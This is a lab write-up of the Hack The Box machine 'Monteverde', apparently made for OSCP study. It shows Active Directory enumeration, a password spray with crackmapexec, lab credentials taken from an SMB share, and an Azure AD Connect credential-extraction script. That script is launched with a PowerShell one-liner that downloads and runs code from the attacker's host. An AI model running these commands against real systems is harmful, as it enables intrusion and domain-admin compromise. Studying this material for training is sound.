HTB Monteverde done

Monteverde

OS:

Windows

Technology:

IP Address:

10.10.10.172

Open ports:

┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Monteverde]
└─$ cat 10.10.10.172_nmap_vulns.nmap| grep "tcp.*open"
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-05-11 11:08:27Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
56148/tcp open  msrpc         Microsoft Windows RPC

Users and pass:

From LDAP
Guest
AAD_987d7f2f57d2
Mike
SABatchJobs
svc-ata
svc-bexec
svc-netapp
Dimitris
Ray
Sally
---
From Azure
Username: mhope
Password: 4n0therD4y@n0th3r$
---
From Azure
Username: administrator
Password: d0m@in4dminyeah!

Nmap

└─$ sudo nmap -Pn -A -sV --script=default,vuln -p- --open -oA 10.10.10.172_nmap_vulns 10.10.10.172
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-15 10:18 UTC
Nmap scan report for 10.10.10.172
Host is up (0.038s latency).
Not shown: 65516 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-05-15 10:20:31Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
|_ssl-ccs-injection: No reply from server (TIMEOUT)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
|_ssl-ccs-injection: No reply from server (TIMEOUT)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
49853/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
| smb2-time: 
|   date: 2023-05-15T10:21:28
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required

TRACEROUTE (using port 53/tcp)
HOP RTT      ADDRESS
1 37.42 ms 10.10.14.1
2 37.85 ms 10.10.10.172

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 442.18 seconds

Add hostname to /etc/hosts

┌──(root㉿kali)-[~]
└─# echo "10.10.10.172 MEGABANK.LOCAL" >> /etc/hosts

Domain enumeration

Download windapsearch

┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Monteverde]
└─$ wget https://raw.githubusercontent.com/ropnop/windapsearch/master/windapsearch.py
--2023-05-15 10:57:18--  https://raw.githubusercontent.com/ropnop/windapsearch/master/windapsearch.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.109.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 32804 (32K) [text/plain]
Saving to: ‘windapsearch.py’

windapsearch.py               100%[==============================================>]  32.04K  --.-KB/s    in 0.04s   

2023-05-15 10:57:19 (722 KB/s) - ‘windapsearch.py’ saved [32804/32804]

Enumerate the domain users

┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Monteverde]
└─$ python windapsearch.py -u "" --dc-ip 10.10.10.172 -U --admin-objects | tee windapsearch_dump
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.10.10.172
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=MEGABANK,DC=LOCAL
[+] Attempting bind
[+] ...success! Binded as: 
[+]  None

[+] Enumerating all AD users
[+] Found 10 users: 

cn: Guest

cn: AAD_987d7f2f57d2

cn: Mike Hope
userPrincipalName: [email protected]

cn: SABatchJobs
userPrincipalName: [email protected]

cn: svc-ata
userPrincipalName: [email protected]

cn: svc-bexec
userPrincipalName: [email protected]

cn: svc-netapp
userPrincipalName: [email protected]

cn: Dimitris Galanos
userPrincipalName: [email protected]

cn: Ray O'Leary
userPrincipalName: [email protected]

cn: Sally Morgan
userPrincipalName: [email protected]

[+] Attempting to enumerate all admin (protected) objects
[+] Found 0 Admin Objects:


[*] Bye!

Extract a username list from the windapsearch dump

┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Monteverde]
└─$ cat windapsearch_dump | grep "cn" | awk '{print $2}' > windapsearch_username

┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Monteverde]
└─$ cat windapsearch_username                                                   
Guest
AAD_987d7f2f57d2
Mike
SABatchJobs
svc-ata
svc-bexec
svc-netapp
Dimitris
Ray
Sally

List the members of the Remote Management Users group via LDAP

┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Monteverde]
└─$ python windapsearch.py -u "" --dc-ip 10.10.10.172 -U -m "Remote Management Users"
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.10.10.172
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=MEGABANK,DC=LOCAL
[+] Attempting bind
[+] ...success! Binded as: 
[+]  None

[+] Enumerating all AD users
[+] Found 10 users: 

cn: Guest

cn: AAD_987d7f2f57d2

cn: Mike Hope
userPrincipalName: [email protected]

cn: SABatchJobs
userPrincipalName: [email protected]

cn: svc-ata
userPrincipalName: [email protected]

cn: svc-bexec
userPrincipalName: [email protected]

cn: svc-netapp
userPrincipalName: [email protected]

cn: Dimitris Galanos
userPrincipalName: [email protected]

cn: Ray O'Leary
userPrincipalName: [email protected]

cn: Sally Morgan
userPrincipalName: [email protected]

[+] Attempting to enumerate full DN for group: Remote Management Users
[+]  Using DN: CN=Remote Management Users,CN=Builtin,DC=MEGABANK,DC=LOCAL

[+]  Found 1 members:

b'CN=Mike Hope,OU=London,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL'

[*] Bye!

Enumerate domain information (password policy)

The line that matters here is [+] Account Lockout Threshold: None: the domain never locks an account after failed logons, which is the policy gap the password spray in the next section relies on.

┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Monteverde]
└─$ enum4linux -a 10.10.10.172 | tee enum4linux_dump
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon May 15 13:57:39 2023

 =========================================( Target Information )=========================================

Target ........... 10.10.10.172
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
...
[+] Password Info for Domain: MEGABANK

    [+] Minimum password length: 7
    [+] Password history length: 24
    [+] Maximum password age: 41 days 23 hours 53 minutes 
    [+] Password Complexity Flags: 000000

        [+] Domain Refuse Password Change: 0
        [+] Domain Password Store Cleartext: 0
        [+] Domain Password Lockout Admins: 0
        [+] Domain Password No Clear Change: 0
        [+] Domain Password No Anon Change: 0
        [+] Domain Password Complex: 0

    [+] Minimum password age: 1 day 4 minutes 
    [+] Reset Account Lockout Counter: 30 minutes 
    [+] Locked Account Duration: 30 minutes 
    [+] Account Lockout Threshold: None
    [+] Forced Log off Time: Not Set
...
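As an added example (not part of the original writeup), the password-policy block that enum4linux prints can be parsed and scored automatically, so a review of a domain flags the same weak settings a spray would exploit. The sample text is the enum4linux output above; the baseline thresholds (lockout required, complexity on, minimum length 14) are this example's assumptions, not enum4linux's own.

```python
# Added example (not from the original writeup): parse the "[+] key: value"
# password-policy lines enum4linux prints and flag the settings a defender
# would fix. The sample text is copied from the enum4linux output above; the
# baseline thresholds are this example's assumptions, not enum4linux's own.
import re

ENUM4LINUX_SAMPLE = """\
[+] Password Info for Domain: MEGABANK

    [+] Minimum password length: 7
    [+] Password history length: 24
    [+] Maximum password age: 41 days 23 hours 53 minutes
    [+] Password Complexity Flags: 000000
        [+] Domain Password Complex: 0
    [+] Minimum password age: 1 day 4 minutes
    [+] Reset Account Lockout Counter: 30 minutes
    [+] Locked Account Duration: 30 minutes
    [+] Account Lockout Threshold: None
    [+] Forced Log off Time: Not Set
"""

# One "[+] setting: value" line; the value may contain spaces (e.g. "41 days ...").
LINE = re.compile(r"^\s*\[\+\]\s*(?P<key>[^:]+):\s*(?P<value>.*)$")


def parse_policy(text):
    """Return {setting: value} for every '[+] setting: value' line in the block."""
    policy = {}
    for line in text.splitlines():
        m = LINE.match(line)
        if m:
            policy[m.group("key").strip()] = m.group("value").strip()
    return policy


def evaluate_policy(policy, min_length=14):
    """Return (setting, observed, why) findings; min_length is an assumed baseline."""
    findings = []
    threshold = policy.get("Account Lockout Threshold", "None")
    if threshold == "None":
        findings.append(("Account Lockout Threshold", threshold,
                         "no lockout: unlimited guesses per account"))
    if policy.get("Domain Password Complex") == "0":
        findings.append(("Domain Password Complex", "0",
                         "complexity off: dictionary words pass as passwords"))
    length = policy.get("Minimum password length", "")
    if length.isdigit() and int(length) < min_length:
        findings.append(("Minimum password length", length,
                         f"below the assumed baseline of {min_length}"))
    return findings


if __name__ == "__main__":
    for setting, observed, why in evaluate_policy(parse_policy(ENUM4LINUX_SAMPLE)):
        print(f"{setting}: {observed} -> {why}")
```

Against this box the three findings are the missing lockout threshold, complexity disabled and a 7-character minimum; a policy with a threshold set, complexity on and a 14-character minimum returns no findings.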

Foothold - crackmapexec

crackmapexec - password spray of the LDAP user list against SMB (hit: SABatchJobs:SABatchJobs)

┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Monteverde]
└─$ crackmapexec smb 10.10.10.172 -d megabank -u windapsearch_username -p english-basic.txt | grep -v "STATUS_LOGON_FAILURE"
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:megabank) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [+] megabank\SABatchJobs:SABatchJobs 

smbmap - list all shares for user SABatchJobs

┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Monteverde]
└─$ smbmap -u SABatchJobs -p SABatchJobs -d megabank -H 10.10.10.172          
[+] IP: 10.10.10.172:445    Name: MEGABANK.LOCAL                                    
        Disk                                                    Permissions Comment
    ----                                                    ----------- -------
    ADMIN$                                              NO ACCESS   Remote Admin
    azure_uploads                                       READ ONLY   
    C$                                                  NO ACCESS   Default share
    E$                                                  NO ACCESS   Default share
    IPC$                                                READ ONLY   Remote IPC
    NETLOGON                                            READ ONLY   Logon server share 
    SYSVOL                                              READ ONLY   Logon server share 
    users$                                              READ ONLY   

smbmap - find and download files (xlsx|xls|docx|doc|txt|xml|powershell|kdbx)

┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Monteverde]
└─$ smbmap -u SABatchJobs -p SABatchJobs -d megabank -H 10.10.10.172 -A '(xlsx|xls|docx|doc|txt|xml|powershell|kdbx)' -R
[+] IP: 10.10.10.172:445    Name: MEGABANK.LOCAL                                    
[+] Starting search for files matching '(xlsx|xls|docx|doc|txt|xml|powershell|kdbx)' on share azure_uploads.
[+] Starting search for files matching '(xlsx|xls|docx|doc|txt|xml|powershell|kdbx)' on share IPC$.
[+] Starting search for files matching '(xlsx|xls|docx|doc|txt|xml|powershell|kdbx)' on share NETLOGON.
[+] Starting search for files matching '(xlsx|xls|docx|doc|txt|xml|powershell|kdbx)' on share SYSVOL.
[+] Starting search for files matching '(xlsx|xls|docx|doc|txt|xml|powershell|kdbx)' on share users$.
[+] Match found! Downloading: users$\mhope\azure.xml

Read file azure.xml

┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Monteverde]
└─$ cat 10.10.10.172-users_mhope_azure.xml                          
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>         
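azure.xml is a PowerShell CLIXML document (the format Export-Clixml writes), and the serialised type name plus a plain-string Password property is what makes it a credential leak. As an added example (not part of the original writeup), the check below walks such a document and reports every object carrying a secret-named property, which is what a scan of readable shares would run; the sample is the azure.xml above, and the property watch-list is an assumption of this example.

```python
# Added example (not from the original writeup): walk a PowerShell CLIXML
# (Export-Clixml) document and report every serialised object that carries a
# secret-looking property, the check a share audit would run. The sample is
# the azure.xml found on users$ above; the property watch-list is assumed.
import xml.etree.ElementTree as ET

NS = "{http://schemas.microsoft.com/powershell/2004/04}"
SECRET_PROPS = {"password", "secret", "clientsecret", "accesskey"}  # assumption

AZURE_XML = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>"""


def scan_clixml(text):
    """Return one finding per <Obj> whose <Props> hold a secret-named value."""
    findings = []
    for obj in ET.fromstring(text).iter(NS + "Obj"):
        # The first <T> under <TN> is the object's most-derived .NET type.
        types = [t.text for t in obj.findall(f"{NS}TN/{NS}T")]
        props = obj.find(NS + "Props")
        if props is None:
            continue
        end = props.find(f"{NS}DT[@N='EndDate']")
        for prop in props:
            if prop.get("N", "").lower() not in SECRET_PROPS:
                continue
            findings.append({
                "type": types[0] if types else None,
                "property": prop.get("N"),
                # <S> is a plain string; a SecureString would be serialised as <SS>
                "plaintext": prop.tag == NS + "S",
                "expires": end.text if end is not None else None,
                "value_length": len(prop.text or ""),  # never echo the value
            })
    return findings


if __name__ == "__main__":
    for finding in scan_clixml(AZURE_XML):
        print(finding)
```

For this file the single finding is a plaintext Password on a PSADPasswordCredential whose EndDate is in 2054, i.e. a long-lived secret left on a share readable by a low-privileged service account.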

Read flag: user.txt

┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Monteverde]
└─$ evil-winrm -i 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$'

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\mhope\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\mhope\Desktop> dir


    Directory: C:\Users\mhope\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        5/15/2023   1:54 AM             34 user.txt


*Evil-WinRM* PS C:\Users\mhope\Desktop> cat user.txt
8798fb5a0f7e1da54974bae568756ca8
*Evil-WinRM* PS C:\Users\mhope\Desktop> 

Escalation

Check group membership: mhope is a member of MEGABANK\Azure Admins

*Evil-WinRM* PS C:\Users\mhope\Desktop> whoami -all

USER INFORMATION
----------------

User Name      SID
============== ============================================
megabank\mhope S-1-5-21-391775091-850290835-3566037492-1601


GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                          Attributes
=========================================== ================ ============================================ ==================================================
Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
MEGABANK\Azure Admins                       Group            S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

Create and edit script: azuread_decrypt_msol.ps1

Script from here --> https://gist.githubusercontent.com/xpn/0dc393e944d8733e3c63023968583545/raw/d45633c954ee3d40be1bff82648750f516cd3b80/azuread_decrypt_msol.ps1

- Remove the '@_xpn_' from this line: Write-Host “AD Connect Sync Credential Extract POC (@_xpn_)\n”

- Set the connection string to: $client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=LocalHost;Database=ADSync;Trusted_Connection=True;"

- This line has the wrong type of quote marks (note the curly closing quote); it needs plain double quotes: add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll’

Execute script

┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Monteverde]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.172 - - [16/May/2023 11:02:54] "GET /exploit.ps1 HTTP/1.1" 200 -


*Evil-WinRM* PS C:\Users\mhope\Desktop> iex(new-object net.webclient).downloadstring('http://10.10.14.13/exploit.ps1')
AD Connect Sync Credential Extract POC ()

Domain: MEGABANK.LOCAL
Username: administrator
Password: d0m@in4dminyeah!
*Evil-WinRM* PS C:\Users\mhope\Desktop> 

Read flag: root.txt

┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Monteverde]
└─$ evil-winrm -i 10.10.10.172 -u administrator -p 'd0m@in4dminyeah!'

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        5/15/2023   1:54 AM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
1419a81ac378ab70ddd4fa88501459cd

References

https://blog.xpnsec.com/azuread-connect-for-redteam/?ref=t3chnocat.com
https://gist.githubusercontent.com/xpn/0dc393e944d8733e3c63023968583545/raw/d45633c954ee3d40be1bff82648750f516cd3b80/azuread_decrypt_msol.ps1